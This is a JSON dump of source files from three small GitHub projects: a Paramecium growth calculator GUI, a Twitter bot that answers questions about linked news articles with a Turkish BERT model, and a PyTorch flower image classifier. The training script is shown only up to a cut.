[ { "alpha_fraction": 0.7236084342002869, "alphanum_fraction": 0.7312859892845154, "avg_line_length": 18.660377502441406, "blob_id": "88eaa0213ed3d13c33ed3d3eb9c122a2f805cceb", "content_id": "c81acebb07b0de0a7661b8aae9bb89237d77b1db", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1042, "license_type": "permissive", "max_line_length": 219, "num_lines": 53, "path": "/README.md", "repo_name": "EMeyerLab/PTGC", "src_encoding": "UTF-8", "text": "# PTGC\n\nParamecium tetraurelia Growth calculator\n\nA GUI program to help experimentalists with repetitive calculations of population growth for paramecium tetraurelia\n\n# Principle\n\n![Equations](./images/equations.png)\n\n# Screenshot\n\n![Screenshot](./images/screenshot_app.png)\n\n\n# Installation\n\n## Windows\n\n- Go download the v1.0 at https://github.com/GDelevoye/PTGC/releases/tag/1.0\n\n- Download the **.exe and the .dll file**\n\n- **Put them in the same directory**\n\n- **Double click on the .exe file to launch PTGC**\n\n## Linux, MacOS (command-line)\n\n```bash\nuser@computer$:git clone https://github.com/GDelevoye/PTGC.git\nuser@computer$:pip install ./PTGC\n```\n\n# Usage\n\n## Linux, MACOS\n\n```bash\nuser@computer$:PTGC_GUI\n```\n\n## Known trouble\n\n> For people under MacOS **Mojave**, TKinter/Python cause a crash/restart of the desktop. This is a well-known issue. The problem seems to come from MacOS itself and was apparently resolved with the **Catalina** update.\n\n## Windows\n\nJust use the .exe file as described earlier\n\n# Credits\n\nGuillaume DELEVOYE - 2020\n" }, { "alpha_fraction": 0.5070422291755676, "alphanum_fraction": 0.5446009635925293, "avg_line_length": 15.384614944458008, "blob_id": "f269bf35e0c4b117f5e827a8d6715a35d5ca8dfc", "content_id": "d7aa089017fa4a9cb699dd7d5dcc2d7e2768828d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 213, "license_type": "permissive", "max_line_length": 32, "num_lines": 13, "path": "/PTGC/calculations.py", "repo_name": "EMeyerLab/PTGC", "src_encoding": "UTF-8", "text": "import math\n\ndef get_q(Un, n, Uo):\n return 10**(Un/(U0*n))\n\ndef get_n(Un, U0, q):\n return (Un/(U0*math.log(q)))\n\ndef get_U0(Un, n, q):\n return Un/(n*math.log(q))\n\ndef get_Un(U0, q, n):\n return U0*q**n\n" }, { "alpha_fraction": 0.8125, "alphanum_fraction": 0.8125, "avg_line_length": 31, "blob_id": "f9910cc2d125a1e16bd91bc1db74a5d60e6d7cf0", "content_id": "bbec776b80ae9b5c1597a4fae0d6644641735d18", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 32, "license_type": "permissive", "max_line_length": 31, "num_lines": 1, "path": "/PTGC/__init__.py", "repo_name": "EMeyerLab/PTGC", "src_encoding": "UTF-8", "text": "from PTGC.calculations import *\n" }, { "alpha_fraction": 0.7894737124443054, "alphanum_fraction": 0.7894737124443054, "avg_line_length": 37, "blob_id": "11e793d93d63ab5aa19837acc1e78433c4551485", "content_id": "929f646d467bff29b41751c4cd06f99bcf431ac3", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 38, "license_type": "permissive", "max_line_length": 37, "num_lines": 1, "path": "/PTGC/launchers/__init__.py", "repo_name": "EMeyerLab/PTGC", "src_encoding": "UTF-8", "text": "from PTGC.launchers.PTGC_GUI import *\n" }, { "alpha_fraction": 0.5565506815910339, "alphanum_fraction": 0.5800921320915222, "avg_line_length": 25.76712417602539, "blob_id": "a148ad6d3bf57ed2be1499281805b66e865b5fdd", "content_id": "e2aa5628a846f1a6c777d7ad30e1eb4a6097f53e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3909, "license_type": "permissive", "max_line_length": 130, "num_lines": 146, "path": "/PTGC/launchers/PTGC_GUI.py", "repo_name": "EMeyerLab/PTGC", "src_encoding": "UTF-8", "text": "import PTGC as tc\n\nimport PIL.Image\nfrom PIL import ImageTk\n\nfrom math import log\nimport os\nfrom tkinter import *\n\ndef get_q(Un, n, U0):\n return log(Un/U0) / (n*log(2))\n\ndef get_n(Un, U0, q):\n return log(Un/U0) / (q*log(2))\n\ndef get_U0(Un, n, q):\n return Un/(2**(n*q))\n\ndef get_Un(U0, q, n):\n return U0*(2**(n*q))\n\ndef calculer(U0, n, q, Un, fields):\n # print(U0,n,q,Un)\n\n vU0 = U0.get()\n vn = n.get()\n vq = q.get()\n vUn = Un.get()\n\n\n missings = []\n answer = \"\"\n output = \"When we have the followings : \"\n\n if not vU0:\n missings.append(\"U0\")\n else:\n output = output+\" U0={} \".format(vU0)\n if not vn:\n missings.append(\"n\")\n else:\n output = output+\" n={} \".format(vn)\n if not vq:\n missings.append(\"q\")\n else:\n output = output+\" q={} \".format(vq)\n if not vUn:\n missings.append(\"Un\")\n else:\n output = output+\" Un={} \".format(vUn)\n\n if len(missings) > 1:\n answer = \" --> Then we don't have enough information to compute anything\"\n elif len(missings) == 0:\n answer = \" --> Then nothing needs to be computed\"\n elif len(missings) == 1:\n if missings[0] == \"U0\":\n answer = \", then we can guess that {} = {}\".format(\"U0\",str(get_U0(float(vUn), float(vn),float(vq))))\n if missings[0] == \"n\":\n answer = \", then we can guess that {} = {}\".format(\"n\",str(get_n(float(vUn), float(vU0),float(vq))))\n if missings[0] == \"q\":\n answer = \", then we can guess that {} = {}\".format(\"q\",str(get_q(float(vUn), float(vn), float(vU0))))\n if missings[0] == \"Un\":\n answer = \", then we can guess that {} = {}\".format(\"Un\",str(get_Un(float(vU0),float(vq),float(vn))))\n output = output + answer\n\n U0.set(\"\")\n n.set(\"\")\n q.set(\"\")\n Un.set(\"\")\n\n\n champs5 = Label(fields,text=\"{}\".format(output))\n champs5.config(font=(\"Times New Roman\", 15))\n champs5.pack()\n fields.pack()\n\n\n\ndef PTGC_GUI():\n fenetre = Tk()\n fenetre.title(\"PTGC\")\n fenetre.resizable(height = None, width = None)\n\n # img_path = os.path.abspath(os.path.dirname(__file__)+\"/../../images/\")\n # imgicon = PhotoImage(file=os.path.join(img_path,'icone.ppm'))\n # fenetre.tk.call('wm', 'iconphoto', fenetre._w, imgicon)\n\n fenetre.geometry('800x480')\n ############\n\n\n fields = Frame(fenetre)\n\n top_msg = Label(fields,text=\"\"\"\n Enter 3 parameters among those 4:\n \"\"\")\n top_msg.config(font=(\"Arial\",22))\n top_msg.pack()\n\n champs1 = Label(fields,text=\"Number of cells at J0 ? (U0)\")\n champs1.config(font=(\"Times New Roman\", 15))\n champs1.pack()\n var_texte = StringVar()\n ligne_texte = Entry(fields, textvariable=var_texte)\n ligne_texte.pack()\n\n champs2 = Label(fields,text=\"Number of days ? (n)\")\n champs2.config(font=(\"Times New Roman\", 15))\n champs2.pack()\n\n var_texte2 = StringVar()\n ligne_texte2 = Entry(fields, textvariable=var_texte2)\n ligne_texte2.pack()\n\n champs3 = Label(fields,text=\"Number of division every 24 hour ? (q)\")\n champs3.config(font=(\"Times New Roman\", 15))\n champs3.pack()\n var_texte3 = StringVar()\n ligne_texte3 = Entry(fields, textvariable=var_texte3)\n ligne_texte3.pack()\n\n champs4 = Label(fields,text=\"Number of cells at day n ? (Un)\")\n champs4.config(font=(\"Times New Roman\", 15))\n champs4.pack()\n var_texte4 = StringVar()\n ligne_texte4 = Entry(fields, textvariable=var_texte4)\n ligne_texte4.pack()\n\n bouton_calculer = Button(fields, text=\"Compute\", command=lambda: calculer(var_texte, var_texte2,var_texte3,var_texte4,fields))\n bouton_calculer.pack()\n\n # champs5 = Label(fields,text=f\"\\nRésultat : ? \")\n # champs5.config(font=(\"Times New Roman\", 15))\n # champs5.pack()\n\n fields.pack()\n\n #### Illustration of equations\n\n\n\n fenetre.mainloop()\n\nif __name__ == '__main__':\n PTGC_GUI()\n" } ]
5
r0sky/Yani
https://github.com/r0sky/Yani
b5be095b561c5b61a3739e40ee30caa2ae581d12
e1b90a5883ffe99515abb248a550a6920bb8b197
a2804b539d409d2f4f1873819b378773541dc283
refs/heads/main
2023-09-01T15:13:56.555186
2021-10-09T20:56:32
2021-10-09T20:56:32
415,410,636
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.582402229309082, "alphanum_fraction": 0.5879888534545898, "avg_line_length": 22.866666793823242, "blob_id": "4e7701e53f482a92775c015c6d67f39b2d5aef8a", "content_id": "930161b9298aa8b9b508c765b6c2a373b8aa423f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 716, "license_type": "permissive", "max_line_length": 53, "num_lines": 30, "path": "/reply.py", "repo_name": "r0sky/Yani", "src_encoding": "UTF-8", "text": "import tweepy\nimport time\nfrom tweepy_client import twitter_api\nimport bot_functions\nimport qa_model\n\n\ndef execute_bot() -> None:\n \"\"\"\n main method to prepare model and run the bot\n \"\"\"\n print(\"Yani? started..\")\n api = twitter_api()\n print(\"Tweepy Authentication is successful.\")\n nlp = qa_model.get_bert_qa_model()\n print(\"Bert QA Model preparation is successful.\")\n while True:\n try:\n bot_functions.bot_run(api=api, model=nlp)\n time.sleep(20)\n except tweepy.TweepError as e:\n print(e)\n print('sleeping...')\n time.sleep(60)\n except StopIteration:\n break\n\n\nif __name__ == '__main__':\n execute_bot()\n" }, { "alpha_fraction": 0.6511375904083252, "alphanum_fraction": 0.6514987349510193, "avg_line_length": 34.05063247680664, "blob_id": "e0c052038959cdd420b36de865a9a150003517a2", "content_id": "744d07cffc70c6b6a574d7338c528031df9e6c33", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2769, "license_type": "permissive", "max_line_length": 127, "num_lines": 79, "path": "/bot_functions.py", "repo_name": "r0sky/Yani", "src_encoding": "UTF-8", "text": "import transformers\nimport tweepy\nimport helper_functions as helper\nimport article\nimport qa_model\n\nFILE_NAME = 'last_seen.txt'\n\n\ndef get_news_url(tweet):\n \"\"\"\n searchs and returns the link in the tweet\n Args:\n tweet: tweet as tweepy object\n Returns:\n url if exists\n \"\"\"\n print(\"Searching for URL in the tweet..\")\n try:\n return tweet.entities.get('urls')[0].get('expanded_url')\n except:\n print(\"Url is missing..\")\n print(\"Tweet: {}\".format(tweet))\n return None\n\n\ndef reply_tweet(root_tweet, original_mention, api, model):\n \"\"\"\n method that contains all functions to reply and favourite the mention considered as a question\n Args:\n root_tweet: mentioned root tweet object\n original_mention: mention that triggers Yani\n api: authenticated tweepy api object\n model: pre-trained turkish qa model pipeline\n Returns:\n none\n \"\"\"\n print(\"Replying Tweet.\")\n print(\"Original Mention:\", original_mention)\n print(\"Original Mention Text:\", original_mention.full_text)\n question = helper.get_clean_tweet(original_mention.full_text)\n print(question)\n news_link = get_news_url(tweet=root_tweet)\n print(\"news link: {}\".format(news_link))\n news_link = helper.track_url(org_url=news_link)\n print(\"Redirected URL: {}\".format(news_link))\n article_content = article.get_news_text(news_url=news_link)\n if article_content is \"\":\n print(\"Couldn't get news content!\")\n else:\n answer = qa_model.get_answer(news_context=article_content, user_question=question, model=model)\n status = '@' + root_tweet.user.screen_name + \" @\" + original_mention.user.screen_name + \" \" + str(answer.get(\"answer\"))\n try:\n api.create_favorite(original_mention.id)\n except:\n pass\n print(\"Tweet is favorited.\")\n api.update_status(status, in_reply_to_status_id=original_mention.id)\n helper.store_last_seen(FILE_NAME, original_mention.id)\n print(status)\n print(\"Replied!\")\n\n\ndef bot_run(api: tweepy.API, model: transformers.pipeline) -> None:\n \"\"\"\n gets non-replied&mentioned tweets and replies\n Args:\n api: authenticated tweepy api object\n model: pre-trained turkish qa model pipeline\n Returns:\n None\n \"\"\"\n print(\"Yani? is running..\")\n # gets mentioned tweets which are not already replied\n tweets = api.mentions_timeline(since_id=helper.read_last_seen(FILE_NAME), tweet_mode='extended')\n for tweet in reversed(tweets):\n if helper.is_not_reply(tweet):\n root_tweet = helper.get_tweet_root(tweet_id=tweet.id, api=api)\n reply_tweet(root_tweet=root_tweet, original_mention=tweet, api=api, model=model)\n" }, { "alpha_fraction": 0.6047173738479614, "alphanum_fraction": 0.6091907024383545, "avg_line_length": 27.264368057250977, "blob_id": "48412ff397c5c524e5d0f9b2590879fc3e4187b5", "content_id": "5551bc6b57d58f19f800a3b4c583efff203ba2bf", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2459, "license_type": "permissive", "max_line_length": 95, "num_lines": 87, "path": "/helper_functions.py", "repo_name": "r0sky/Yani", "src_encoding": "UTF-8", "text": "import re\nimport tweepy\nfrom bs4 import BeautifulSoup\nimport requests\n\n\ndef read_last_seen(FILE_NAME: str) -> int:\n \"\"\"\n gets the id of last seen tweet\n Args:\n FILE_NAME: static file name which stores the last seen id\n Returns:\n last_seen_id: id of the tweet\n \"\"\"\n file_read = open(FILE_NAME, 'r')\n readed = file_read.read()\n if readed != \"\":\n last_seen_id = int(readed.strip())\n file_read.close()\n return last_seen_id\n else:\n return 0\n print(\"Last Seen ID is readed.\")\n\n\ndef store_last_seen(FILE_NAME: str, last_seen_id: int) -> None:\n \"\"\"\n saves the id of a last seen tweet in the txt\n Args:\n FILE_NAME: static file name which stores the last seen id\n last_seen_id: id of the tweet\n \"\"\"\n file_write = open(FILE_NAME, 'w')\n file_write.write(str(last_seen_id))\n file_write.close()\n print(\"Last Seen ID is stored.\")\n return\n\n\ndef is_not_reply(tweet):\n count = tweet.full_text.count('@')\n return count < 5\n\n\ndef get_tweet_root(tweet_id: int, api: tweepy.API):\n \"\"\"\n gets the origin tweet which is mentioned\n Args:\n tweet_id: id of the mention\n api: authenticated tweepy api object\n Returns:\n mentioned root tweet object\n \"\"\"\n print(\"Getting Tweet Root..\")\n while api.get_status(tweet_id).in_reply_to_status_id is not None:\n tweet_id = api.get_status(tweet_id).in_reply_to_status_id\n return api.get_status(tweet_id, tweet_mode=\"extended\")\n\n\ndef get_clean_tweet(tweet: str) -> str:\n \"\"\"\n cleans text from urls and words begin with @,#\n Args:\n tweet: text version of tweet\n Returns:\n cleaned text\n \"\"\"\n return ' '.join(re.sub(\"(@[A-Za-z0-9]+)|(#[A-Za-z0-9])|(\\w+:\\/\\/\\S+)\", \" \", tweet).split())\n\n\ndef track_url(org_url: str) -> str:\n \"\"\"\n tracks the url and where it leads to and returns the final redirected url\n Args:\n org_url: link in the root tweet\n Returns:\n redirected url\n \"\"\"\n print(\"Tracking URL..\")\n url = \"https://wheregoes.com/trace/\"\n data = {'url': org_url, 'ua': 'Wheregoes.com Redirect Checker/1.0'}\n post_data = requests.post(url, data=data).text\n soup = BeautifulSoup(post_data, 'lxml')\n url_list = soup.find_all('div', class_=\"cell url\")\n redirected_url = url_list[-1].contents[1]['href']\n print(\"Returning redirected URL..\")\n return redirected_url if redirected_url is not \"\" else \"\"\n" }, { "alpha_fraction": 0.6606851816177368, "alphanum_fraction": 0.6606851816177368, "avg_line_length": 26.863636016845703, "blob_id": "8ce1d2cb2ae06abd31ccce068cf5fd6546cd7b06", "content_id": "0caf3356077ea1aad372df7db2d3a6fdddec369c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 613, "license_type": "permissive", "max_line_length": 83, "num_lines": 22, "path": "/tweepy_client.py", "repo_name": "r0sky/Yani", "src_encoding": "UTF-8", "text": "from os import environ\nimport tweepy\n\n\ndef twitter_api() -> tweepy.API:\n \"\"\"\n authenticates twitter API\n Args:\n none\n Returns:\n authenticated tweepy api object\n \"\"\"\n print(\"Tweepy Authentication Started..\")\n # key and secrets could be kept in an environment\n consumer_key = \"\"\n consumer_secret = \"\"\n access_token = \"\"\n access_token_secret = \"\"\n auth = tweepy.OAuthHandler(consumer_key, consumer_secret)\n auth.set_access_token(access_token, access_token_secret)\n api = tweepy.API(auth, wait_on_rate_limit=True, wait_on_rate_limit_notify=True)\n return api\n" }, { "alpha_fraction": 0.6923592686653137, "alphanum_fraction": 0.6923592686653137, "avg_line_length": 38.26315689086914, "blob_id": "d27a9449e064e20ec9d9a43af026fda3d20a3c96", "content_id": "d53372b7cff578a1f9795b4c91b5ba8167fe7dd4", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1492, "license_type": "permissive", "max_line_length": 99, "num_lines": 38, "path": "/qa_model.py", "repo_name": "r0sky/Yani", "src_encoding": "UTF-8", "text": "from transformers import AutoTokenizer, AutoModelForQuestionAnswering, pipeline\nimport torch\n\n\ndef get_bert_qa_model() -> pipeline:\n \"\"\"\n gets pre-trained turkish qa model by savas yildirim from huggingface via transformers\n Args:\n none\n Returns:\n pre-trained transformers turkish qa model\n \"\"\"\n print(\"Preparing Bert Question Answering Model..\")\n tokenizer = AutoTokenizer.from_pretrained(\"savasy/bert-base-turkish-squad\")\n model = AutoModelForQuestionAnswering.from_pretrained(\"savasy/bert-base-turkish-squad\")\n nlp = pipeline(\"question-answering\", model=model, tokenizer=tokenizer)\n return nlp\n\n\ndef get_answer(news_context: str, user_question: str, model: pipeline):\n \"\"\"\n qa model finds answer in the page content\n Args:\n news_context: content of the page\n user_question: text of the mention accepted as question\n model: pre-trained turkish qa model pipeline\n Returns:\n answer that qa model finds which contains text as an answer and the confidence rate\n \"\"\"\n print(\"Getting Answer..\")\n print(\"news context: {}\\nquestion: {}\\nmodel: {}\".format(news_context, user_question, model))\n if news_context is None:\n print(\"Couldn't get the context. Please check the printed tweet ID. URL might be missing.\")\n else:\n print(\"Model Started to get answer..\")\n answer = model(question=user_question, context=news_context)\n print(\"Model Returns the answer..\")\n return answer\n" }, { "alpha_fraction": 0.8006042242050171, "alphanum_fraction": 0.8046324253082275, "avg_line_length": 98.30000305175781, "blob_id": "6426e94965e7ec7125aebd355bf1dad205b6cc27", "content_id": "7c71405f1f29fea2b400dc72413706a6d81d07eb", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 993, "license_type": "permissive", "max_line_length": 220, "num_lines": 10, "path": "/README.md", "repo_name": "r0sky/Yani", "src_encoding": "UTF-8", "text": "# Yani\nA twitter bot that reads the content of the shared link and answers your question.\n\nEspecially news and content sites; Twitter pages that arouse curiosity and waste our time by giving the link instead of sharing very short information that can be transferred with 280 characters..\nThere are some popular twitter pages created to avoid these annoying clickbait and waste of time. Two of them are @bosunatiklama and @LimonHaber.\nHowever, these accounts cannot respond to the content of every news page, so they cannot meet the demands of dozens of followers. Because account holders need to read and write content or retweet other volunteers' posts.\nThe aim here is to automate this work and any user can get the answer to their question by tagging the bot.\nThe bot answers the question by mentioning it publicly, so anyone who thinks about a similar question can see the answer under the original tweet.\n\n![example bot usage](https://github.com/r0sky/Yani/blob/main/bot_ss.png?raw=true)\n" }, { "alpha_fraction": 0.6666666865348816, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 19.700000762939453, "blob_id": "28b7ea7be29e9bdaa5fdf7119e5446d23b6c3c4d", "content_id": "80dac9add1f52214689af1fbdff3b7d0d218a4c5", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 414, "license_type": "permissive", "max_line_length": 41, "num_lines": 20, "path": "/article.py", "repo_name": "r0sky/Yani", "src_encoding": "UTF-8", "text": "from newspaper import Article\n\n\ndef get_news_text(news_url: str):\n \"\"\"\n scrapes website and returns the content\n Args:\n news_url: url to be scraped\n Returns:\n content in the related page\n \"\"\"\n print(\"Getting Article Content..\")\n if news_url is None:\n print(\"URL is missing\")\n return None\n else:\n article = Article(news_url)\n article.download()\n article.parse()\n return article.text\n" } ]
7
tom91i/Udacity-AI-Image-Classifier-
https://github.com/tom91i/Udacity-AI-Image-Classifier-
ee4e4af94f7a063fe87b39fbdf291bf555f31911
75d35367101d62b2ff0c48a109e7c48b3cc59071
ae6021b5a7d2ea965e546b8abb7e8127f9012dcf
refs/heads/master
2021-01-26T04:03:18.268668
2020-02-27T00:16:27
2020-02-27T00:16:27
243,301,561
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6174072623252869, "alphanum_fraction": 0.6430900692939758, "avg_line_length": 28.37724494934082, "blob_id": "ae41c8f3084de5b38eed8f3d79d52618e7a75208", "content_id": "102dd52d69f3d45acb057454890a133aa142c466", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4910, "license_type": "no_license", "max_line_length": 140, "num_lines": 167, "path": "/predict.py", "repo_name": "tom91i/Udacity-AI-Image-Classifier-", "src_encoding": "UTF-8", "text": "# Image Classifier Part-2: Prediction\n#PROGRAMMER: Thomas Innerebner\n#Date created:29.01.2020\n#Date revised:26.02.2020\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport torch\nfrom numba import cuda\nfrom torch import nn, optim\nimport torch.nn.functional as F\nfrom torchvision import datasets, transforms, models\nfrom PIL import Image\nimport json\nimport time\n\nimport argparse\n\n#TO DO: Parser arguments\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument(\"--image_input\", default=\"/home/workspace/ImageClassifier/flowers/test/1/image_06743.jpg\", help=\"path to training data\")\nparser.add_argument(\"--gpu\", default=\"gpu\", help=\"trains on GPU\", action=\"store\")\nparser.add_argument(\"--checkpoint\", default= \"/home/workspace/ImageClassifier/checkpoint.pth\", help=\"Path to trained model\")\nparser.add_argument(\"--top_k\", default=3, type=int, help=\"top categories\")\nparser.add_argument(\"--category_names\", default= \"/home/workspace/ImageClassifier/cat_to_name.json\")\nargs = parser.parse_args()\n\n# DONE: GPU \n\nif args.gpu == \"gpu\":\n power = \"cuda\"\nelse:\n power = \"cpu\"\n\n# DONE: Parser\n\nimage_input = args.image_input\ncheckpoint = args.checkpoint\ntop_k = args.top_k\ncategory_names = args.category_names\n\n\n#Done: Print settings:\n\nprint(power) \nprint(image_input)\nprint(checkpoint)\nprint(top_k)\nprint(category_names)\n\n# DONE: Define modell structure\n\nstructures = {\"vgg16\":25088,\n \"densenet121\" : 1024,\n \"alexnet\" : 9216 } \n \n# DONE: Eingangsgrößen und Modell Auswahl (VGG13 Changes)\n \ndef nn_setup(structure='vgg16',dropout = 0.4, hidden_units = 4096, learning_rate = 0.001):\n \n if structure == 'vgg16':\n model = models.vgg16(pretrained=True) \n elif structure == 'densenet121':\n model = models.densenet121(pretrained=True)\n elif structure == 'alexnet':\n model = models.alexnet(pretrained = True)\n else:\n print(\"{} ist kein valides Modell\".format(structure))\n \n # Training aussetzen \n \n for param in model.parameters():\n param.requires_grad = False\n\n # Classifier definieren\n \n from collections import OrderedDict\n classifier = nn.Sequential(OrderedDict([\n ('dropout',nn.Dropout(dropout)),\n ('inputs', nn.Linear(structures[structure], hidden_units)),\n ('relu1', nn.ReLU()),\n ('hidden_layer1', nn.Linear(hidden_units, 1000)),\n ('relu2',nn.ReLU()),\n ('hidden_layer2',nn.Linear(1000,103)),\n ('output', nn.LogSoftmax(dim=1))\n ]))\n \n model.classifier = classifier\n criterion = nn.NLLLoss()\n optimizer = optim.Adam(model.classifier.parameters(), learning_rate )\n \n return model , optimizer ,criterion \n\n# Load model (Dropout rate changes)\ndef load_model(path = \"/home/workspace/ImageClassifier/checkpoint.pth\"):\n checkpoint = torch.load(\"/home/workspace/ImageClassifier/checkpoint.pth\")\n structure = checkpoint['structure']\n hidden_units = checkpoint['hidden_units']\n model,_,_= nn_setup(structure, 0.4, hidden_units)\n model.class_to_idx = checkpoint['class_to_idx']\n model.load_state_dict(checkpoint['state_dict'])\n return model\n\nload_model(\"/home/workspace/ImageClassifier/checkpoint.pth\")\n\nprint(\"model succesfully loaded\")\n\n#DONE: Load cat names\n\nwith open(category_names, 'r') as f:\n cat_to_name = json.load(f)\n\n#DONE : Process image:\n\ndef process_image(image):\n \n pil_image = Image.open(image)\n im_resized = pil_image.resize((224,224))\n \n np_image = np.array(im_resized)\n np_image = np_image/255\n \n mean = np.array([0.485, 0.456, 0.406])\n std = np.array([0.229, 0.224, 0.225])\n np_image = (np_image - mean)/std\n np_image = np_image.transpose(2, 0, 1)\n return np_image\n\n#process_image(image_input)\n\n#TO DO: Predict image:\n\ndef predict(image_input, model, top_k=3, power=\"cuda\"): \n model.to(power)\n img_pip = process_image(image_input)\n img_tensor = torch.from_numpy(img_pip)\n img_tensor = img_tensor.unsqueeze_(0)\n img_tensor = img_tensor.float()\n with torch.no_grad():\n output = model.forward(img_tensor.to(power))\n \n probability = F.softmax(output.data,dim=1)\n \n return probability.topk(top_k)\n\n# TO DO: Load Model checkpoint\n\nmodel = load_model(checkpoint)\n\nimage_filename = image_input.split('/')[-2]\nname = cat_to_name[image_filename]\n\nprobs, classes = predict (image_input, model, top_k, power)\nprobs = probs.data.cpu().numpy().squeeze()\nclasses = classes.data.cpu().numpy().squeeze()+1\n\n\nprint(probs)\nprint(name)\n\n# present result\nprint(\"v--------------result------------------v\")\nfor i in range(0, len(classes)):\n print(\"class: {}; with a probability of: {}\".format(cat_to_name[str(classes[i])], probs[i]))\nprint(\"Λ--------------result------------------Λ\")\n" }, { "alpha_fraction": 0.5244618654251099, "alphanum_fraction": 0.5502474904060364, "avg_line_length": 32.48262405395508, "blob_id": "4f266a2e1f38a47b8fdf4477d1f04b8ae58fb5fe", "content_id": "7bfd7e5a174c2696e1a05096fe4b7b3a2f33a1ff", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8689, "license_type": "no_license", "max_line_length": 117, "num_lines": 259, "path": "/train.py", "repo_name": "tom91i/Udacity-AI-Image-Classifier-", "src_encoding": "UTF-8", "text": "# Image Classifier Part-2: Training a CNN Model\n#PROGRAMMER: Thomas Innerebner\n#Date created:29.01.2020\n#Date revised:26.02.2020\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport torch\nfrom numba import cuda\nfrom torch import nn, optim\nimport torch.nn.functional as F\nfrom torchvision import datasets, transforms, models\nfrom PIL import Image\nimport json\nimport time\n\nimport argparse\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument(\"--data_dir\", default=\"/home/workspace/ImageClassifier/flowers\", help=\"path to training data\")\nparser.add_argument(\"--gpu\", default=\"gpu\", help=\"trains on GPU\", action=\"store\")\nparser.add_argument(\"--structure\", default= \"vgg16\", help=\"structure\")\nparser.add_argument(\"--learning_rate\", default=0.001, type=float, help=\"learning rate\")\nparser.add_argument(\"--dropout\", default=0.4, type=float)\nparser.add_argument(\"--epochs\", default=3, type= int, help=\"Number of Epochs\")\nparser.add_argument(\"--hidden_units\", default=4096, type =int, help=\"Hidden units\")\nparser.add_argument(\"--save_dir\", default=\"/home/workspace/ImageClassifier/checkpoint.pth\", help=\"path and filename\")\nargs = parser.parse_args()\n \n# DONE: GPU \n\nif args.gpu == \"gpu\":\n power = \"cuda\"\nelse:\n power = \"cpu\"\n\n # DONE: Parser\n \ndata_dir = args.data_dir\nlearning_rate = args.learning_rate\nhidden_units = args.hidden_units\ndropout = args.dropout\nepochs = args.epochs\nstructure = args.structure\nsave_dir =args.save_dir\n\n#DONE: Print settings\n\nprint(power) \nprint(structure)\nprint(learning_rate)\nprint(dropout)\nprint(hidden_units)\nprint(epochs)\nprint(save_dir)\n\n \nprint(\"Training Input from:\", data_dir)\n\ntrain_dir = data_dir + '/train'\nvalid_dir = data_dir + '/valid'\ntest_dir = data_dir + '/test'\n \n# DONE: Define your transforms for the training, validation, and testing sets\n\ntrain_transforms = transforms.Compose([transforms.RandomRotation(30),\n transforms.RandomCrop (224),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406],\n [0.229, 0.224, 0.225])])\n \nvalidate_transforms = transforms.Compose([transforms.Resize(256),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406],\n [0.229, 0.224, 0.225])])\n\ntest_transforms = transforms.Compose([transforms.Resize(256),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406],\n [0.229, 0.224, 0.225])])\n\n# DONE: Load the datasets with ImageFolder\n\n\ntrain_data = datasets.ImageFolder(train_dir, transform = train_transforms)\nvalidate_data = datasets.ImageFolder(valid_dir, transform = validate_transforms)\ntest_data = datasets.ImageFolder(test_dir, transform = test_transforms)\n\n# DONE: Using the image datasets and the trainforms, define the dataloaders\ntrainloader = torch.utils.data.DataLoader(train_data, batch_size = 64, shuffle = True)\nvalidloader = torch.utils.data.DataLoader(validate_data, batch_size = 64, shuffle = True)\ntestloader = torch.utils.data.DataLoader(test_data, batch_size = 64)\n\nclasses = train_data.classes\n\nprint ('n classes in trainloader:',len(trainloader))\nprint ('n of pics:', len(trainloader.dataset)) \n \n# DONE: Define modell structure\n\nstructures = {\"vgg16\":25088,\n \"densenet121\" : 1024,\n \"alexnet\" : 9216 } \n \n# DONE: Eingangsgrößen und Modell Auswahl\n \ndef nn_setup(structure='vgg16',dropout = 0.4, hidden_units = 4096, learning_rate = 0.001):\n \n \n if structure == 'vgg16':\n model = models.vgg16(pretrained=True) \n elif structure == 'densenet121':\n model = models.densenet121(pretrained=True)\n elif structure == 'alexnet':\n model = models.alexnet(pretrained = True)\n else:\n print(\"{} ist kein valides Modell\".format(structure))\n \n # Training aussetzen \n \n for param in model.parameters():\n param.requires_grad = False\n\n # Classifier definieren\n \n from collections import OrderedDict\n classifier = nn.Sequential(OrderedDict([\n ('dropout',nn.Dropout(dropout)),\n ('inputs', nn.Linear(structures[structure], hidden_units)),\n ('relu1', nn.ReLU()),\n ('hidden_layer1', nn.Linear(hidden_units, 1000)),\n ('relu2',nn.ReLU()),\n ('hidden_layer2',nn.Linear(1000,103)),\n ('output', nn.LogSoftmax(dim=1))\n ]))\n \n model.classifier = classifier\n criterion = nn.NLLLoss()\n optimizer = optim.Adam(model.classifier.parameters(), 